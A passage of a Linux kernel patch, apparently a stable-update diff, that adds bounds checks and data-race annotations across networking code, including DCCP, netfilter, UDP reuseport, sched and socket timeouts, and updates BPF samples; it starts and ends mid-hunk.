+@@ -443,11 +444,12 @@ static int sock_set_timeout(long *timeo_p, sockptr_t optval, int optlen,
+ 		}
+ 		return 0;
+ 	}
+-	*timeo_p = MAX_SCHEDULE_TIMEOUT;
+-	if (tv.tv_sec == 0 && tv.tv_usec == 0)
+-		return 0;
+-	if (tv.tv_sec < (MAX_SCHEDULE_TIMEOUT / HZ - 1))
+-		*timeo_p = tv.tv_sec * HZ + DIV_ROUND_UP((unsigned long)tv.tv_usec, USEC_PER_SEC / HZ);
++	val = MAX_SCHEDULE_TIMEOUT;
++	if ((tv.tv_sec || tv.tv_usec) &&
++	    (tv.tv_sec < (MAX_SCHEDULE_TIMEOUT / HZ - 1)))
++		val = tv.tv_sec * HZ + DIV_ROUND_UP((unsigned long)tv.tv_usec,
++						    USEC_PER_SEC / HZ);
++	WRITE_ONCE(*timeo_p, val);
+ 	return 0;
+ }
+ 
+@@ -791,7 +793,7 @@ EXPORT_SYMBOL(sock_set_reuseport);
+ void sock_no_linger(struct sock *sk)
+ {
+ 	lock_sock(sk);
+-	sk->sk_lingertime = 0;
++	WRITE_ONCE(sk->sk_lingertime, 0);
+ 	sock_set_flag(sk, SOCK_LINGER);
+ 	release_sock(sk);
+ }
+@@ -809,9 +811,9 @@ void sock_set_sndtimeo(struct sock *sk, s64 secs)
+ {
+ 	lock_sock(sk);
+ 	if (secs && secs < MAX_SCHEDULE_TIMEOUT / HZ - 1)
+-		sk->sk_sndtimeo = secs * HZ;
++		WRITE_ONCE(sk->sk_sndtimeo, secs * HZ);
+ 	else
+-		sk->sk_sndtimeo = MAX_SCHEDULE_TIMEOUT;
++		WRITE_ONCE(sk->sk_sndtimeo, MAX_SCHEDULE_TIMEOUT);
+ 	release_sock(sk);
+ }
+ EXPORT_SYMBOL(sock_set_sndtimeo);
+@@ -1217,15 +1219,15 @@ set_sndbuf:
+ 			ret = -EFAULT;
+ 			break;
+ 		}
+-		if (!ling.l_onoff)
++		if (!ling.l_onoff) {
+ 			sock_reset_flag(sk, SOCK_LINGER);
+-		else {
+-#if (BITS_PER_LONG == 32)
+-			if ((unsigned int)ling.l_linger >= MAX_SCHEDULE_TIMEOUT/HZ)
+-				sk->sk_lingertime = MAX_SCHEDULE_TIMEOUT;
++		} else {
++			unsigned long t_sec = ling.l_linger;
++
++			if (t_sec >= MAX_SCHEDULE_TIMEOUT / HZ)
++				WRITE_ONCE(sk->sk_lingertime, MAX_SCHEDULE_TIMEOUT);
+ 			else
+-#endif
+-				sk->sk_lingertime = (unsigned int)ling.l_linger * HZ;
++				WRITE_ONCE(sk->sk_lingertime, t_sec * HZ);
+ 			sock_set_flag(sk, SOCK_LINGER);
+ 		}
+ 		break;
+@@ -1676,7 +1678,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 	case SO_LINGER:
+ 		lv		= sizeof(v.ling);
+ 		v.ling.l_onoff	= sock_flag(sk, SOCK_LINGER);
+-		v.ling.l_linger	= sk->sk_lingertime / HZ;
++		v.ling.l_linger	= READ_ONCE(sk->sk_lingertime) / HZ;
+ 		break;
+ 
+ 	case SO_BSDCOMPAT:
+@@ -1708,12 +1710,14 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 
+ 	case SO_RCVTIMEO_OLD:
+ 	case SO_RCVTIMEO_NEW:
+-		lv = sock_get_timeout(sk->sk_rcvtimeo, &v, SO_RCVTIMEO_OLD == optname);
++		lv = sock_get_timeout(READ_ONCE(sk->sk_rcvtimeo), &v,
++				      SO_RCVTIMEO_OLD == optname);
+ 		break;
+ 
+ 	case SO_SNDTIMEO_OLD:
+ 	case SO_SNDTIMEO_NEW:
+-		lv = sock_get_timeout(sk->sk_sndtimeo, &v, SO_SNDTIMEO_OLD == optname);
++		lv = sock_get_timeout(READ_ONCE(sk->sk_sndtimeo), &v,
++				      SO_SNDTIMEO_OLD == optname);
+ 		break;
+ 
+ 	case SO_RCVLOWAT:
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index bfececa9e244e..8f5d3c0881118 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -255,12 +255,17 @@ static int dccp_v4_err(struct sk_buff *skb, u32 info)
+ 	int err;
+ 	struct net *net = dev_net(skb->dev);
+ 
+-	/* Only need dccph_dport & dccph_sport which are the first
+-	 * 4 bytes in dccp header.
++	/* For the first __dccp_basic_hdr_len() check, we only need dh->dccph_x,
++	 * which is in byte 7 of the dccp header.
+ 	 * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us.
++	 *
++	 * Later on, we want to access the sequence number fields, which are
++	 * beyond 8 bytes, so we have to pskb_may_pull() ourselves.
+ 	 */
+-	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+-	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
++	dh = (struct dccp_hdr *)(skb->data + offset);
++	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
++		return -EINVAL;
++	iph = (struct iphdr *)skb->data;
+ 	dh = (struct dccp_hdr *)(skb->data + offset);
+ 
+ 	sk = __inet_lookup_established(net, &dccp_hashinfo,
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index b51ce6f8ceba0..2b09e2644b13f 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -74,7 +74,7 @@ static inline __u64 dccp_v6_init_sequence(struct sk_buff *skb)
+ static int dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 			u8 type, u8 code, int offset, __be32 info)
+ {
+-	const struct ipv6hdr *hdr = (const struct ipv6hdr *)skb->data;
++	const struct ipv6hdr *hdr;
+ 	const struct dccp_hdr *dh;
+ 	struct dccp_sock *dp;
+ 	struct ipv6_pinfo *np;
+@@ -83,12 +83,17 @@ static int dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	__u64 seq;
+ 	struct net *net = dev_net(skb->dev);
+ 
+-	/* Only need dccph_dport & dccph_sport which are the first
+-	 * 4 bytes in dccp header.
++	/* For the first __dccp_basic_hdr_len() check, we only need dh->dccph_x,
++	 * which is in byte 7 of the dccp header.
+ 	 * Our caller (icmpv6_notify()) already pulled 8 bytes for us.
++	 *
++	 * Later on, we want to access the sequence number fields, which are
++	 * beyond 8 bytes, so we have to pskb_may_pull() ourselves.
+ 	 */
+-	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+-	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
++	dh = (struct dccp_hdr *)(skb->data + offset);
++	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
++		return -EINVAL;
++	hdr = (const struct ipv6hdr *)skb->data;
+ 	dh = (struct dccp_hdr *)(skb->data + offset);
+ 
+ 	sk = __inet6_lookup_established(net, &dccp_hashinfo,
+diff --git a/net/ipv4/igmp.c b/net/ipv4/igmp.c
+index 81be3e0f0e704..cbc4816ed7d83 100644
+--- a/net/ipv4/igmp.c
++++ b/net/ipv4/igmp.c
+@@ -353,8 +353,9 @@ static struct sk_buff *igmpv3_newpack(struct net_device *dev, unsigned int mtu)
+ 	struct flowi4 fl4;
+ 	int hlen = LL_RESERVED_SPACE(dev);
+ 	int tlen = dev->needed_tailroom;
+-	unsigned int size = mtu;
++	unsigned int size;
+ 
++	size = min(mtu, IP_MAX_MTU);
+ 	while (1) {
+ 		skb = alloc_skb(size + hlen + tlen,
+ 				GFP_ATOMIC | __GFP_NOWARN);
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index acfe58d2f1dd7..ebd2cea5b7d7a 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -214,7 +214,7 @@ static int ip_finish_output2(struct net *net, struct sock *sk, struct sk_buff *s
+ 	if (lwtunnel_xmit_redirect(dst->lwtstate)) {
+ 		int res = lwtunnel_xmit(skb);
+ 
+-		if (res < 0 || res == LWTUNNEL_XMIT_DONE)
++		if (res != LWTUNNEL_XMIT_CONTINUE)
+ 			return res;
+ 	}
+ 
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index e2d3ea2e34561..c697836f2b5b4 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -287,7 +287,7 @@ static void tcp_incr_quickack(struct sock *sk, unsigned int max_quickacks)
+ 		icsk->icsk_ack.quick = quickacks;
+ }
+ 
+-void tcp_enter_quickack_mode(struct sock *sk, unsigned int max_quickacks)
++static void tcp_enter_quickack_mode(struct sock *sk, unsigned int max_quickacks)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 
+@@ -295,7 +295,6 @@ void tcp_enter_quickack_mode(struct sock *sk, unsigned int max_quickacks)
+ 	inet_csk_exit_pingpong_mode(sk);
+ 	icsk->icsk_ack.ato = TCP_ATO_MIN;
+ }
+-EXPORT_SYMBOL(tcp_enter_quickack_mode);
+ 
+ /* Send ACKs quickly, if "quick" count is not exhausted
+  * and the session is not interactive.
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index cf354c29ec123..44b49f7d1a9e6 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -441,6 +441,22 @@ static void tcp_fastopen_synack_timer(struct sock *sk, struct request_sock *req)
+ 			  req->timeout << req->num_timeout, TCP_RTO_MAX);
+ }
+ 
++static bool tcp_rtx_probe0_timed_out(const struct sock *sk,
++				     const struct sk_buff *skb)
++{
++	const struct tcp_sock *tp = tcp_sk(sk);
++	const int timeout = TCP_RTO_MAX * 2;
++	u32 rcv_delta, rtx_delta;
++
++	rcv_delta = inet_csk(sk)->icsk_timeout - tp->rcv_tstamp;
++	if (rcv_delta <= timeout)
++		return false;
++
++	rtx_delta = (u32)msecs_to_jiffies(tcp_time_stamp(tp) -
++			(tp->retrans_stamp ?: tcp_skb_timestamp(skb)));
++
++	return rtx_delta > timeout;
++}
+ 
+ /**
+  *  tcp_retransmit_timer() - The TCP retransmit timeout handler
+@@ -506,7 +522,7 @@ void tcp_retransmit_timer(struct sock *sk)
+ 					    tp->snd_una, tp->snd_nxt);
+ 		}
+ #endif
+-		if (tcp_jiffies32 - tp->rcv_tstamp > TCP_RTO_MAX) {
++		if (tcp_rtx_probe0_timed_out(sk, skb)) {
+ 			tcp_write_err(sk);
+ 			goto out;
+ 		}
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 956d6797c76f3..42c1f7d9a980a 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -445,14 +445,24 @@ static struct sock *udp4_lib_lookup2(struct net *net,
+ 		score = compute_score(sk, net, saddr, sport,
+ 				      daddr, hnum, dif, sdif);
+ 		if (score > badness) {
+-			result = lookup_reuseport(net, sk, skb,
+-						  saddr, sport, daddr, hnum);
++			badness = score;
++			result = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++			if (!result) {
++				result = sk;
++				continue;
++			}
++
+ 			/* Fall back to scoring if group has connections */
+-			if (result && !reuseport_has_conns(sk))
++			if (!reuseport_has_conns(sk))
+ 				return result;
+ 
+-			result = result ? : sk;
+-			badness = score;
++			/* Reuseport logic returned an error, keep original score. */
++			if (IS_ERR(result))
++				continue;
++
++			badness = compute_score(result, net, saddr, sport,
++						daddr, hnum, dif, sdif);
++
+ 		}
+ 	}
+ 	return result;
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index 95a55c6630add..34192f7a166fb 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -112,7 +112,7 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 	if (lwtunnel_xmit_redirect(dst->lwtstate)) {
+ 		int res = lwtunnel_xmit(skb);
+ 
+-		if (res < 0 || res == LWTUNNEL_XMIT_DONE)
++		if (res != LWTUNNEL_XMIT_CONTINUE)
+ 			return res;
+ 	}
+ 
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 27348172b25b9..64b36c2ba774a 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -193,14 +193,23 @@ static struct sock *udp6_lib_lookup2(struct net *net,
+ 		score = compute_score(sk, net, saddr, sport,
+ 				      daddr, hnum, dif, sdif);
+ 		if (score > badness) {
+-			result = lookup_reuseport(net, sk, skb,
+-						  saddr, sport, daddr, hnum);
++			badness = score;
++			result = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++			if (!result) {
++				result = sk;
++				continue;
++			}
++
+ 			/* Fall back to scoring if group has connections */
+-			if (result && !reuseport_has_conns(sk))
++			if (!reuseport_has_conns(sk))
+ 				return result;
+ 
+-			result = result ? : sk;
+-			badness = score;
++			/* Reuseport logic returned an error, keep original score. */
++			if (IS_ERR(result))
++				continue;
++
++			badness = compute_score(sk, net, saddr, sport,
++						daddr, hnum, dif, sdif);
+ 		}
+ 	}
+ 	return result;
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 763cefd0cc268..2f9e1abdf375d 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -4391,7 +4391,7 @@ static void ieee80211_mlo_multicast_tx(struct net_device *dev,
+ 				       struct sk_buff *skb)
+ {
+ 	struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev);
+-	unsigned long links = sdata->vif.valid_links;
++	unsigned long links = sdata->vif.active_links;
+ 	unsigned int link;
+ 	u32 ctrl_flags = IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX;
+ 
+@@ -5827,7 +5827,7 @@ void __ieee80211_tx_skb_tid_band(struct ieee80211_sub_if_data *sdata,
+ 		rcu_read_unlock();
+ 
+ 		if (WARN_ON_ONCE(link == ARRAY_SIZE(sdata->vif.link_conf)))
+-			link = ffs(sdata->vif.valid_links) - 1;
++			link = ffs(sdata->vif.active_links) - 1;
+ 	}
+ 
+ 	IEEE80211_SKB_CB(skb)->control.flags |=
+@@ -5863,7 +5863,7 @@ void ieee80211_tx_skb_tid(struct ieee80211_sub_if_data *sdata,
+ 		band = chanctx_conf->def.chan->band;
+ 	} else {
+ 		WARN_ON(link_id >= 0 &&
+-			!(sdata->vif.valid_links & BIT(link_id)));
++			!(sdata->vif.active_links & BIT(link_id)));
+ 		/* MLD transmissions must not rely on the band */
+ 		band = 0;
+ 	}
+diff --git a/net/netfilter/ipset/ip_set_hash_netportnet.c b/net/netfilter/ipset/ip_set_hash_netportnet.c
+index 005a7ce87217e..bf4f91b78e1dc 100644
+--- a/net/netfilter/ipset/ip_set_hash_netportnet.c
++++ b/net/netfilter/ipset/ip_set_hash_netportnet.c
+@@ -36,6 +36,7 @@ MODULE_ALIAS("ip_set_hash:net,port,net");
+ #define IP_SET_HASH_WITH_PROTO
+ #define IP_SET_HASH_WITH_NETS
+ #define IPSET_NET_COUNT 2
++#define IP_SET_HASH_WITH_NET0
+ 
+ /* IPv4 variant */
+ 
+diff --git a/net/netfilter/nft_exthdr.c b/net/netfilter/nft_exthdr.c
+index a67ea9c3ae57d..c307c57a93e57 100644
+--- a/net/netfilter/nft_exthdr.c
++++ b/net/netfilter/nft_exthdr.c
+@@ -238,7 +238,12 @@ static void nft_exthdr_tcp_set_eval(const struct nft_expr *expr,
+ 	if (!tcph)
+ 		goto err;
+ 
++	if (skb_ensure_writable(pkt->skb, nft_thoff(pkt) + tcphdr_len))
++		goto err;
++
++	tcph = (struct tcphdr *)(pkt->skb->data + nft_thoff(pkt));
+ 	opt = (u8 *)tcph;
++
+ 	for (i = sizeof(*tcph); i < tcphdr_len - 1; i += optl) {
+ 		union {
+ 			__be16 v16;
+@@ -253,15 +258,6 @@ static void nft_exthdr_tcp_set_eval(const struct nft_expr *expr,
+ 		if (i + optl > tcphdr_len || priv->len + priv->offset > optl)
+ 			goto err;
+ 
+-		if (skb_ensure_writable(pkt->skb,
+-					nft_thoff(pkt) + i + priv->len))
+-			goto err;
+-
+-		tcph = nft_tcp_header_pointer(pkt, sizeof(buff), buff,
+-					      &tcphdr_len);
+-		if (!tcph)
+-			goto err;
+-
+ 		offset = i + priv->offset;
+ 
+ 		switch (priv->len) {
+@@ -325,9 +321,9 @@ static void nft_exthdr_tcp_strip_eval(const struct nft_expr *expr,
+ 	if (skb_ensure_writable(pkt->skb, nft_thoff(pkt) + tcphdr_len))
+ 		goto drop;
+ 
+-	opt = (u8 *)nft_tcp_header_pointer(pkt, sizeof(buff), buff, &tcphdr_len);
+-	if (!opt)
+-		goto err;
++	tcph = (struct tcphdr *)(pkt->skb->data + nft_thoff(pkt));
++	opt = (u8 *)tcph;
++
+ 	for (i = sizeof(*tcph); i < tcphdr_len - 1; i += optl) {
+ 		unsigned int j;
+ 
+diff --git a/net/netfilter/xt_sctp.c b/net/netfilter/xt_sctp.c
+index 680015ba7cb6e..d4bf089c9e3f9 100644
+--- a/net/netfilter/xt_sctp.c
++++ b/net/netfilter/xt_sctp.c
+@@ -150,6 +150,8 @@ static int sctp_mt_check(const struct xt_mtchk_param *par)
+ {
+ 	const struct xt_sctp_info *info = par->matchinfo;
+ 
++	if (info->flag_count > ARRAY_SIZE(info->flag_info))
++		return -EINVAL;
+ 	if (info->flags & ~XT_SCTP_VALID_FLAGS)
+ 		return -EINVAL;
+ 	if (info->invflags & ~XT_SCTP_VALID_FLAGS)
+diff --git a/net/netfilter/xt_u32.c b/net/netfilter/xt_u32.c
+index 177b40d08098b..117d4615d6684 100644
+--- a/net/netfilter/xt_u32.c
++++ b/net/netfilter/xt_u32.c
+@@ -96,11 +96,32 @@ static bool u32_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ 	return ret ^ data->invert;
+ }
+ 
++static int u32_mt_checkentry(const struct xt_mtchk_param *par)
++{
++	const struct xt_u32 *data = par->matchinfo;
++	const struct xt_u32_test *ct;
++	unsigned int i;
++
++	if (data->ntests > ARRAY_SIZE(data->tests))
++		return -EINVAL;
++
++	for (i = 0; i < data->ntests; ++i) {
++		ct = &data->tests[i];
++
++		if (ct->nnums > ARRAY_SIZE(ct->location) ||
++		    ct->nvalues > ARRAY_SIZE(ct->value))
++			return -EINVAL;
++	}
++
++	return 0;
++}
++
+ static struct xt_match xt_u32_mt_reg __read_mostly = {
+ 	.name       = "u32",
+ 	.revision   = 0,
+ 	.family     = NFPROTO_UNSPEC,
+ 	.match      = u32_mt,
++	.checkentry = u32_mt_checkentry,
+ 	.matchsize  = sizeof(struct xt_u32),
+ 	.me         = THIS_MODULE,
+ };
+diff --git a/net/netlabel/netlabel_kapi.c b/net/netlabel/netlabel_kapi.c
+index 54c0830039470..27511c90a26f4 100644
+--- a/net/netlabel/netlabel_kapi.c
++++ b/net/netlabel/netlabel_kapi.c
+@@ -857,7 +857,8 @@ int netlbl_catmap_setlong(struct netlbl_lsm_catmap **catmap,
+ 
+ 	offset -= iter->startbit;
+ 	idx = offset / NETLBL_CATMAP_MAPSIZE;
+-	iter->bitmap[idx] |= bitmap << (offset % NETLBL_CATMAP_MAPSIZE);
++	iter->bitmap[idx] |= (NETLBL_CATMAP_MAPTYPE)bitmap
++			     << (offset % NETLBL_CATMAP_MAPSIZE);
+ 
+ 	return 0;
+ }
+diff --git a/net/netrom/af_netrom.c b/net/netrom/af_netrom.c
+index 5a4cb796150f5..ec5747969f964 100644
+--- a/net/netrom/af_netrom.c
++++ b/net/netrom/af_netrom.c
+@@ -660,6 +660,11 @@ static int nr_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		goto out_release;
+ 	}
+ 
++	if (sock->state == SS_CONNECTING) {
++		err = -EALREADY;
++		goto out_release;
++	}
++
+ 	sk->sk_state   = TCP_CLOSE;
+ 	sock->state = SS_UNCONNECTED;
+ 
+diff --git a/net/sched/em_meta.c b/net/sched/em_meta.c
+index 49bae3d5006b0..6f2f135aab676 100644
+--- a/net/sched/em_meta.c
++++ b/net/sched/em_meta.c
+@@ -502,7 +502,7 @@ META_COLLECTOR(int_sk_lingertime)
+ 		*err = -1;
+ 		return;
+ 	}
+-	dst->value = sk->sk_lingertime / HZ;
++	dst->value = READ_ONCE(sk->sk_lingertime) / HZ;
+ }
+ 
+ META_COLLECTOR(int_sk_err_qlen)
+@@ -568,7 +568,7 @@ META_COLLECTOR(int_sk_rcvtimeo)
+ 		*err = -1;
+ 		return;
+ 	}
+-	dst->value = sk->sk_rcvtimeo / HZ;
++	dst->value = READ_ONCE(sk->sk_rcvtimeo) / HZ;
+ }
+ 
+ META_COLLECTOR(int_sk_sndtimeo)
+@@ -579,7 +579,7 @@ META_COLLECTOR(int_sk_sndtimeo)
+ 		*err = -1;
+ 		return;
+ 	}
+-	dst->value = sk->sk_sndtimeo / HZ;
++	dst->value = READ_ONCE(sk->sk_sndtimeo) / HZ;
+ }
+ 
+ META_COLLECTOR(int_sk_sendmsg_off)
+diff --git a/net/sched/sch_hfsc.c b/net/sched/sch_hfsc.c
+index 70b0c5873d326..61d52594ff6d8 100644
+--- a/net/sched/sch_hfsc.c
++++ b/net/sched/sch_hfsc.c
+@@ -1012,6 +1012,10 @@ hfsc_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 		if (parent == NULL)
+ 			return -ENOENT;
+ 	}
++	if (!(parent->cl_flags & HFSC_FSC) && parent != &q->root) {
++		NL_SET_ERR_MSG(extack, "Invalid parent - parent class must have FSC");
++		return -EINVAL;
++	}
+ 
+ 	if (classid == 0 || TC_H_MAJ(classid ^ sch->handle) != 0)
+ 		return -EINVAL;
+diff --git a/net/sctp/sm_sideeffect.c b/net/sctp/sm_sideeffect.c
+index 463c4a58d2c36..970c6a486a9b0 100644
+--- a/net/sctp/sm_sideeffect.c
++++ b/net/sctp/sm_sideeffect.c
+@@ -1251,7 +1251,10 @@ static int sctp_side_effects(enum sctp_event_type event_type,
+ 	default:
+ 		pr_err("impossible disposition %d in state %d, event_type %d, event_id %d\n",
+ 		       status, state, event_type, subtype.chunk);
+-		BUG();
++		error = status;
++		if (error >= 0)
++			error = -EINVAL;
++		WARN_ON_ONCE(1);
+ 		break;
+ 	}
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 84219c5121bc2..f774d840759d6 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1807,7 +1807,7 @@ void smc_close_non_accepted(struct sock *sk)
+ 	lock_sock(sk);
+ 	if (!sk->sk_lingertime)
+ 		/* wait for peer closing */
+-		sk->sk_lingertime = SMC_MAX_STREAM_WAIT_TIMEOUT;
++		WRITE_ONCE(sk->sk_lingertime, SMC_MAX_STREAM_WAIT_TIMEOUT);
+ 	__smc_release(smc);
+ 	release_sock(sk);
+ 	sock_put(sk); /* sock_hold above */
+diff --git a/net/socket.c b/net/socket.c
+index c2e0a22f16d9b..d281a7ef4b1d3 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -3507,7 +3507,11 @@ EXPORT_SYMBOL(kernel_accept);
+ int kernel_connect(struct socket *sock, struct sockaddr *addr, int addrlen,
+ 		   int flags)
+ {
+-	return sock->ops->connect(sock, addr, addrlen, flags);
++	struct sockaddr_storage address;
++
++	memcpy(&address, addr, addrlen);
++
++	return sock->ops->connect(sock, (struct sockaddr *)&address, addrlen, flags);
+ }
+ EXPORT_SYMBOL(kernel_connect);
+ 
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index c2363d44a1ffc..12c7c89d5be1d 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -323,6 +323,7 @@ nl80211_pmsr_ftm_req_attr_policy[NL80211_PMSR_FTM_REQ_ATTR_MAX + 1] = {
+ 	[NL80211_PMSR_FTM_REQ_ATTR_TRIGGER_BASED] = { .type = NLA_FLAG },
+ 	[NL80211_PMSR_FTM_REQ_ATTR_NON_TRIGGER_BASED] = { .type = NLA_FLAG },
+ 	[NL80211_PMSR_FTM_REQ_ATTR_LMR_FEEDBACK] = { .type = NLA_FLAG },
++	[NL80211_PMSR_FTM_REQ_ATTR_BSS_COLOR] = { .type = NLA_U8 },
+ };
+ 
+ static const struct nla_policy
+diff --git a/net/wireless/util.c b/net/wireless/util.c
+index 39680e7bad45a..f433f3fdd9e94 100644
+--- a/net/wireless/util.c
++++ b/net/wireless/util.c
+@@ -5,7 +5,7 @@
+  * Copyright 2007-2009	Johannes Berg <johannes@sipsolutions.net>
+  * Copyright 2013-2014  Intel Mobile Communications GmbH
+  * Copyright 2017	Intel Deutschland GmbH
+- * Copyright (C) 2018-2022 Intel Corporation
++ * Copyright (C) 2018-2023 Intel Corporation
+  */
+ #include <linux/export.h>
+ #include <linux/bitops.h>
+@@ -2479,6 +2479,13 @@ void cfg80211_remove_links(struct wireless_dev *wdev)
+ {
+ 	unsigned int link_id;
+ 
++	/*
++	 * links are controlled by upper layers (userspace/cfg)
++	 * only for AP mode, so only remove them here for AP
++	 */
++	if (wdev->iftype != NL80211_IFTYPE_AP)
++		return;
++
+ 	wdev_lock(wdev);
+ 	if (wdev->valid_links) {
+ 		for_each_valid_link(wdev, link_id)
+diff --git a/samples/bpf/tracex3_kern.c b/samples/bpf/tracex3_kern.c
+index bde6591cb20c5..af235bd6615b1 100644
+--- a/samples/bpf/tracex3_kern.c
++++ b/samples/bpf/tracex3_kern.c
+@@ -11,6 +11,12 @@
+ #include <bpf/bpf_helpers.h>
+ #include <bpf/bpf_tracing.h>
+ 
++struct start_key {
++	dev_t dev;
++	u32 _pad;
++	sector_t sector;
++};
++
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_HASH);
+ 	__type(key, long);
+@@ -18,16 +24,17 @@ struct {
+ 	__uint(max_entries, 4096);
+ } my_map SEC(".maps");
+ 
+-/* kprobe is NOT a stable ABI. If kernel internals change this bpf+kprobe
+- * example will no longer be meaningful
+- */
+-SEC("kprobe/blk_mq_start_request")
+-int bpf_prog1(struct pt_regs *ctx)
++/* from /sys/kernel/tracing/events/block/block_io_start/format */
++SEC("tracepoint/block/block_io_start")
++int bpf_prog1(struct trace_event_raw_block_rq *ctx)
+ {
+-	long rq = PT_REGS_PARM1(ctx);
+ 	u64 val = bpf_ktime_get_ns();
++	struct start_key key = {
++		.dev = ctx->dev,
++		.sector = ctx->sector
++	};
+ 
+-	bpf_map_update_elem(&my_map, &rq, &val, BPF_ANY);
++	bpf_map_update_elem(&my_map, &key, &val, BPF_ANY);
+ 	return 0;
+ }
+ 
+@@ -49,21 +56,26 @@ struct {
+ 	__uint(max_entries, SLOTS);
+ } lat_map SEC(".maps");
+ 
+-SEC("kprobe/__blk_account_io_done")
+-int bpf_prog2(struct pt_regs *ctx)
++/* from /sys/kernel/tracing/events/block/block_io_done/format */
++SEC("tracepoint/block/block_io_done")
++int bpf_prog2(struct trace_event_raw_block_rq *ctx)
+ {
+-	long rq = PT_REGS_PARM1(ctx);
++	struct start_key key = {
++		.dev = ctx->dev,
++		.sector = ctx->sector
++	};
++
+ 	u64 *value, l, base;
+ 	u32 index;
+ 
+-	value = bpf_map_lookup_elem(&my_map, &rq);
++	value = bpf_map_lookup_elem(&my_map, &key);
+ 	if (!value)
+ 		return 0;
+ 
+ 	u64 cur_time = bpf_ktime_get_ns();
+ 	u64 delta = cur_time - *value;
+ 
+-	bpf_map_delete_elem(&my_map, &rq);
++	bpf_map_delete_elem(&my_map, &key);
+ 
+ 	/* the lines below are computing index = log10(delta)*10
+ 	 * using integer arithmetic
+diff --git a/samples/bpf/tracex6_kern.c b/samples/bpf/tracex6_kern.c
+index acad5712d8b4f..fd602c2774b8b 100644
+--- a/samples/bpf/tracex6_kern.c
++++ b/samples/bpf/tracex6_kern.c
+@@ -2,6 +2,8 @@
+ #include <linux/version.h>
+ #include <uapi/linux/bpf.h>
+ #include <bpf/bpf_helpers.h>
++#include <bpf/bpf_tracing.h>
++#include <bpf/bpf_core_read.h>
+ 
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+@@ -45,13 +47,24 @@ int bpf_prog1(struct pt_regs *ctx)
+ 	return 0;
+ }
+ 
+-SEC("kprobe/htab_map_lookup_elem")
+-int bpf_prog2(struct pt_regs *ctx)
++/*
++ * Since *_map_lookup_elem can't be expected to trigger bpf programs
++ * due to potential deadlocks (bpf_disable_instrumentation), this bpf
++ * program will be attached to bpf_map_copy_value (which is called
++ * from map_lookup_elem) and will only filter the hashtable type.
++ */
++SEC("kprobe/bpf_map_copy_value")
++int BPF_KPROBE(bpf_prog2, struct bpf_map *map)
+ {
+ 	u32 key = bpf_get_smp_processor_id();
+ 	struct bpf_perf_event_value *val, buf;
++	enum bpf_map_type type;
+ 	int error;
+ 
++	type = BPF_CORE_READ(map, map_type);
++	if (type != BPF_MAP_TYPE_HASH)
++		return 0;
++
+ 	error = bpf_perf_event_read_value(&counters, key, &buf, sizeof(buf));
+ 	if (error)
+ 		return 0;
+diff --git a/scripts/rust_is_available.sh b/scripts/rust_is_available.sh
+index aebbf19139709..7a925d2b20fc7 100755
+--- a/scripts/rust_is_available.sh
++++ b/scripts/rust_is_available.sh
+@@ -2,8 +2,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ #
+ # Tests whether a suitable Rust toolchain is available.
+-#
+-# Pass `-v` for human output and more checks (as warnings).
+ 
+ set -e
+ 
+@@ -23,21 +21,17 @@ get_canonical_version()
+ 
+ # Check that the Rust compiler exists.
+ if ! command -v "$RUSTC" >/dev/null; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Rust compiler '$RUSTC' could not be found."
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
